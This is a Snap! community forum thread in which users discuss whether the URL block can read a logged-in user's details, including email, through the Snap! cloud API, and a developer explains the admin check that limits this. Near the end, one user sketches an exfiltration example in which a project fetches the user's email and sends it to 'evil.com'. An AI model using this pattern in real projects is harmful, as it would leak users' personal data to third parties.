Son of <green flag is being clicked any way?> block

helicoptur · July 10, 2021, 7:16am

It accesses a Snap! API page that gives some information about the currently logged in user, which includes your verified status, username, and user ID. There's also a slightly more complicated method which can get the user's join date, project count, and email address. (All with the url block.)

bh · July 10, 2021, 7:41am

Hmm that's wrong. Especially the email part.

programmer_user · July 10, 2021, 1:05pm

That's the problem. You need to run projects on a separate domain.

ego-lay_atman-bay · July 10, 2021, 6:20pm

I know it was changed, because the email used to be stored here https://snap.berkeley.edu/api/v1/users/c, but I guess they just moved it to some other part of the api.

18001767679 · July 11, 2021, 7:49am

In user.lua:

user = function (self)
            -- GET /users/:username
            -- Description: Get info about a user
            if not users_match(self) then assert_admin(self) end
            return jsonResponse(
                db.query(
                    [[SELECT
                        users.username, users.created, users.role, users.email,/*whoops email*/
                        users.verified, users.id, count(projects.projectname)
                            AS project_count
                    FROM active_users AS users
                    LEFT JOIN active_projects AS projects
                        ON projects.username = users.username
                    WHERE users.username = ?
                    GROUP BY
                        users.username, users.created, users.role, users.email,
                        users.verified, users.id]],
                    self.params.username
                )[1]
            )
        end,

bromagosa · July 12, 2021, 6:04am

/c has never returned an email.

OTOH, this gives information about the currently logged in user, so I can't see the security breach anywhere. It's a way for Snap! to verify who's logged in.

Read the assert above, will you? If you're asking this about a user that's not yourself, then you need to be an admin to get it.

The /user call gives you back all user info, but only about your user. If you think reading back your own email is a security breach, then I don't know what to tell you.

[rant]
Now that JS functions are behind a setting are you all trying to break the cloud using the URL block? I wish people put as much effort into learning actual computer science with Snap!...
[/rant]

18001767679 · July 12, 2021, 6:39am

programmer_user · July 13, 2021, 1:41pm

In theory, a project could read a user's email and send it to a remote server.
Something like

GET /api/v1/users/c
GET evil.com/email/<email>

18001767679 · July 14, 2021, 6:01am

yep
see Hazard - #9 by earthrulerr

system · August 13, 2021, 6:02am

This topic was automatically closed 30 days after the last reply. New replies are no longer allowed.